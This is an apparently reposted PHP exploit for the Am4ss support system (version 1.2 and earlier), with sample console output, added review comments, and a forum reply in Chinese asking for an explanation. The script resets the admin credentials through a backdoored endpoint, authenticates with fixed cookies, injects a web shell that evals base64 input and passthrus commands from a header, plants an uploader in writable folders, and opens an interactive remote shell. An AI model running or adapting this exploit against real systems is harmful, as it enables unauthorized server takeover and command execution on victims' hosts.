am4ss支持系统1.2 PHP代码注入利用

  1. <?
  2. /*
  3. + Title : Am4ss <= 1.2 , PHP Code Injection
  4. | Download : am4ss.com
  5. | Tested on: Windows xp sp3 , CentOs
  6. | Author : Faris , aka i-Hmx
  7. Time line :
  8. > 10/2011 , Vulnerability discovered
  9. > till now, I haven't reported it to the vendor. Why?
  10.    The idiot backdoored it by himself + the official site is fucked up ;)
  11. > 19/07/2012 , Publicly disclosed
  12.   
  13. C:\lab>php am4ss.php localhost /lab/am4ss/
  14. +---------------------------------------+
  15. |      Am4SS , PHP Code Injection       |
  16. |         Exploited By i-Hmx            |
  17. |                                       |
  18. +---------------------------------------+
  19. | Testing Authentication
  20. | Injecting our Evil php code
  21. | Searching for Injected PageID
  22.      => 0
  23.      => 1
  24.      => 2
  25.      => 3
  26.      => 4
  27.      => 5
  28. | Injected ID is 5
  29. | I Have wrriten Tiny uploader at :
  30.    + localhost/lab/am4ss//am4ss_cache/fa.php
  31.    + localhost/lab/am4ss//templates/fa.php
  32. | sec4ever shell online ;)
  33. [url=mailto:i-Hmx@localhost]i-Hmx@localhost[/url]# net user
  34. User accounts for \\
  35. -------------------------------------------------------------------------------
  36. Administrator            ASPNET                   Guest
  37. HelpAssistant            IUSR_PHOENIX-XP          IWAM_PHOENIX-XP
  38. PhoeniX                  PhoeniX.Limited          SUPPORT_388945a0
  39. The command completed with one or more errors.
  40.   
  41. [url=mailto:i-Hmx@localhost]i-Hmx@localhost[/url]# exit
  42. */
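  // --- CLI argument handling -------------------------------------------------
  // Usage: php <script> <host without scheme> </application/path/>
  // The usage example in the header passes a path with a leading and a trailing
  // slash ("/lab/am4ss/"); every request URL further down is built by plain
  // concatenation onto $vic, so the trailing slash is what the script expects.
  // empty() replaces the bare `!$argv[2]` test: same truthiness, but no
  // "undefined array key" notice/warning when the script is run with no args.
  if (empty($argv[2]))
  {
      echo "\n+ usage : php ".$argv[0]." [Target without http://] /path/\nex : php ".$argv[0]." site.com /support/\n";
      exit();
  }
  // The session is only used as a scratch store for $host and, later, the id of
  // the injected page; it plays no part in the HTTP requests themselves.
  session_start();
  echo "\n+---------------------------------------+\n";
  echo "|      Am4SS , PHP Code Injection       |\n";
  echo "|         Exploited By i-Hmx            |\n";
  echo "|          n0p1337@gmail.com            |\n";
  echo "|       sec4ever.com , 1337s.cc         |\n";
  echo "+---------------------------------------+\n";
  // $host: bare hostname (plain HTTP, port 80 is assumed everywhere below).
  // $path: application directory on the target.
  // $vic:  host + path, the prefix every request URL is appended to.
  $host = $argv[1];
  $_SESSION['host'] = $host;
  $path = $argv[2];
  $vic = $host . $path;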
  /**
   * Return the text between the first occurrence of $start and the next
   * occurrence of $end after it.
   *
   * A single space is prepended so that a hit at the very beginning of
   * $string can never yield offset 0; strpos() therefore returns 0 only for an
   * empty $start and false when $start is absent, and both cases yield "".
   * When $end is not found after $start the computed length is negative and
   * substr() is called with that negative length — behaviour kept exactly as
   * in the original, since callers only use the result for display/matching.
   */
  function kastr($string, $start, $end){
      $haystack = ' ' . $string;
      $from = strpos($haystack, $start);
      if ($from === false || $from === 0) {
          return '';
      }
      $from += strlen($start);
      $to = strpos($haystack, $end, $from);
      return substr($haystack, $from, $to - $from);
  }
  /**
   * Perform one HTTP request with cURL and return the response body.
   *
   * $url      host + path without a scheme; "http://" is prepended, so only
   *           plain HTTP is supported.
   * $post     raw POST body. It is always handed to CURLOPT_POSTFIELDS, even
   *           when it is the empty string, so every call is sent as a POST.
   * $cookies  raw value for the Cookie request header.
   *
   * Redirects are not followed and the whole transfer is capped at 20 seconds.
   * Returns whatever curl_exec() returns (false on a transport failure).
   */
  function get($url,$post,$cookies){
      $handle = curl_init();
      curl_setopt_array($handle, array(
          CURLOPT_RETURNTRANSFER => 1,
          CURLOPT_URL            => 'http://' . $url,
          CURLOPT_POSTFIELDS     => $post,
          CURLOPT_COOKIE         => $cookies,
          CURLOPT_FOLLOWLOCATION => 0,
          CURLOPT_TIMEOUT        => 20,
      ));
      $body = curl_exec($handle);
      curl_close($handle);
      return $body;
  }
  /*
  Step 1: hit the endpoint that (according to the header comment) resets the
  admin credentials to a fixed pair. This script does not verify that claim; it
  only relies on the observable effect that the e-mail/hash pair used as cookies
  in every later request is accepted afterwards.
  NOTE(review): $ok is assigned but never read; kastr() can only return "" here
  because $vic (host + path) never contains "http://".
  NOTE(review): the "[url=...]" / "[/url]" fragments inside the string literals
  on this page are forum BBCode left over from the paste, not part of the code.
  NOTE(review): eregi() was removed in PHP 7, so this script only runs on 5.x.
  $host is used as a regular expression here, so "." matches any character.
  */
  $ok=kastr($vic,"[url=http://]http://","//[/url]");
  // The response is url-encoded before matching; if it does not mention the
  // host the reset request is treated as failed and the script stops.
  if (!eregi($host,urlencode(get($vic."/libs/internals/core.assign_by_ref.php?password=ef211a58a6a04914923a7bf23a9a7f0c&username=%C7%E1%D4%D1%DE%C7%E6%ED&country=%C7%E1%E3%DB%D1%C8",'',''))))
  {
  die("+ Exploitation Failed :(");
  }
  /*
  Step 2: confirm the admin panel accepts the fixed credentials.
  Authentication is done purely through two cookies (no login form is posted).
  Success is detected by matching a table-footer fragment of
  admincp/settings.php, so any template change on the target breaks the check
  even when the login itself worked.
  */
  echo "| Testing Authentication\n";
  if(!eregi('<td class="tfoot" align="middle" colSpan="2">',get($vic."/admincp/settings.php","",'Am4sS_CPCHERKAOUI_UserEmail=alert@am4ss.com;Am4sS_CPCHERKAOUI_PassWord=ef211a58a6a04914923a7bf23a9a7f0c')))
  {
  /*
  Login may fail because of a bad connection, a wrong admincp path, a firewall,
  etc. The credentials printed below are the same fixed pair used for the
  cookies above, for a manual retry. (The "[url=...]" wrappers inside the
  string are forum BBCode artifacts from the paste.)
  */
  echo "| Authentication Failed\n| Try to login manually using :\n   + User : [url=mailto:alert@am4ss.com]alert@am4ss.com[/url]\n   + Password : kawkawa\n   | auth cookies : \n   + Am4sS_CPCHERKAOUI_UserEmail : [url=mailto:alert@am4ss.com]alert@am4ss.com[/url]\n   + Am4sS_CPCHERKAOUI_PassWord  : ef211a58a6a04914923a7bf23a9a7f0c \n+ Exiting \n";
  die();
  }
  /*
  Step 3: create a CMS page whose "code" field is stored as raw PHP
  (codetype=2). The payload is a minimal web shell: it eval()s base64-decoded
  PHP taken from the "fa" request parameter and passthru()s a base64-decoded
  command taken from a custom "Cmd" request header ($_SERVER[HTTP_CMD]),
  wrapping the command output in "faris>>>" / "<<<faris" markers that kastr()
  extracts later. The page title "farsawy" is arbitrary.
  NOTE(review): $facode is concatenated into the POST body without urlencode().
  It happens to contain no "&", "+" or "%", which is the only reason it survives
  form decoding intact; any edit to the payload must keep that property.
  NOTE(review): the bare array keys (fa, HTTP_CMD) rely on the PHP 5-era
  "undefined constant becomes string" fallback on the target.
  */
  $facode='echo "<pre>Faris on the mic ;)<br>";@eval(base64_decode($_REQUEST[fa]));echo "faris>>>";passthru(base64_decode($_SERVER[HTTP_CMD]));echo "<<<faris";';
  echo "| Injecting our Evil php code\n";
  get($vic."/admincp/pages.php?do=add",'do=save&title=farsawy&codetype=2&code='.$facode.'','Am4sS_CPCHERKAOUI_UserEmail=alert@am4ss.com;Am4sS_CPCHERKAOUI_PassWord=ef211a58a6a04914923a7bf23a9a7f0c');
  echo "| Searching for Injected PageID\n";
  /*
  Step 4: find the new page by probing pageid=0..99 and looking for the ">>>"
  marker the payload prints. The author expects the id to stay below 10 and
  suggests simply re-running the script if the search fails.
  NOTE(review): if no page matches, the loop ends with $f == 100 and
  $_SESSION['id'] is never set, so $myid below is null and the following
  requests are sent with an empty "pageid=" instead of the script aborting.
  */
  for($f=0;$f<100;$f++)
  {
  $mypage=get($vic."/pages.php?pageid=$f","","");
  echo "     => $f\n";
  if(eregi(">>>",$mypage))
  {
  $_SESSION['id']=$f;
  break;
  }
  }
  $myid=$_SESSION['id'];
  echo "| Injected ID is $myid\n";
  /*
  Step 5: use the page's eval() hook to drop a small file uploader ("fa.php")
  into am4ss_cache/ and templates/, which the author says admins commonly leave
  world-writable. The base64 payload passed in "fa" has been stripped from this
  copy of the listing (placeholder below), so this step cannot be reproduced
  from the page as shown.
  NOTE(review): this URL omits the "/" before "pages.php" that every other
  request has; it only resolves because the documented usage passes $path with
  a trailing slash (the other calls then produce "//", which servers tolerate).
  NOTE(review): success is not checked — the "written" message is printed
  unconditionally, whatever the target returned.
  */
  get($vic."pages.php?pageid=$myid&fa=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","","");
  echo "| I Have wrriten Tiny uploader at :\n   + $vic/am4ss_cache/fa.php\n   + $vic/templates/fa.php\n";
  /*
  Step 6: probe whether passthru() is usable on the target. The base64 value
  in "fa" decodes to passthru('echo sec4ever1337s'); and the response is
  searched for that marker. If it is missing the interactive shell below would
  be useless, so the script prints the eval() URL instead and exits.
  NOTE(review): this request uses $f rather than $myid. The two are equal
  whenever the search loop above found the page (break leaves $f at the id);
  they differ only in the not-found case, where $f is 100.
  */
  if (!eregi("sec4ever1337s",get($vic."/pages.php?pageid=$f&fa=cGFzc3RocnUoJ2VjaG8gc2VjNGV2ZXIxMzM3cycpOw==","","")))
  {
  echo "| passthru is disabled \n";
  echo "| You can evaluate Your code at:\n    $vic/pages.php?pageid=$myid&fa=base64_encode(eval code)\n";
  exit('+ Exiting');
  }
  echo "| sec4ever shell online ;)\n";
  141. /*
  142. if passthru() is enabled , then get small command executer
  143. using Egix fsock method to send and retrieve data
  144. */
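  /**
   * Send one raw, fully formed HTTP request string ($packet) to $host on port
   * 80 and return the complete response (headers included) as a string.
   *
   * Returns "" when the connection cannot be opened: the original passed the
   * false returned by a failed fsockopen() straight to fputs(), which is a
   * fatal TypeError on PHP 8 and a warning storm on 5.x. Callers only scan the
   * response for markers, so an empty string simply reads as "no output".
   * The socket is closed explicitly instead of being left to garbage
   * collection, and the failure reason is echoed in the script's usual style.
   */
  function http_send($host, $packet)
  {
      $errno = 0;
      $errstr = '';
      $sock = fsockopen($host, 80, $errno, $errstr);
      if ($sock === false) {
          echo "\n| Connection to $host:80 failed ($errno: $errstr)\n";
          return '';
      }
      fputs($sock, $packet);
      $response = stream_get_contents($sock);
      fclose($sock);
      return $response === false ? '' : $response;
  }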
  /*
  Step 7: interactive command loop. Each command read from stdin is
  base64-encoded into the custom "Cmd:" request header (the %s in $packet) and
  sent as a hand-built HTTP/1.0 request; the injected page passthru()s it and
  whatever sits between "faris>>>" and "<<<faris" in the response is printed.
  NOTE(review): $packet embeds $path between two slashes
  ("GET /{$path}/pages.php"), so with the documented "/lab/am4ss/" argument the
  request line becomes "//lab/am4ss//pages.php"; it works only because servers
  collapse the repeated slashes.
  NOTE(review): "Host:" carries $host without a port and http_send() always
  connects to port 80 — there is no HTTPS support anywhere in this script.
  NOTE(review): when stdin is closed, fgets() returns false and trim(false) is
  "", which never equals "exit", so the loop keeps sending empty commands
  forever; run it interactively or pipe an explicit "exit" line.
  */
  $packet  = "GET /{$path}/pages.php?pageid=$myid HTTP/1.0\r\n";
  $packet .= "Host: {$host}\r\n";
  $packet .= "Cmd: %s\r\n";
  $packet .= "Connection: close\r\n\r\n";
  while(1)
  {
  print "\ni-Hmx@".$_SESSION['host']."# ";
  if (($fa = trim(fgets(STDIN))) == "exit") exit("\n+ Exiting");
  $response = http_send($host, sprintf($packet, base64_encode($fa)));
  $final=kastr($response,"faris>>>","<<<faris");
  echo $final;
  }
  163. /*
  164. woooooow , that really fucked my mind
  165. But it was funny :D
  166. Greets to all sec4ever members
  167. C u Guys in another Bomb ;)
  168. */
  169. ?>

没看懂 给点说明嘛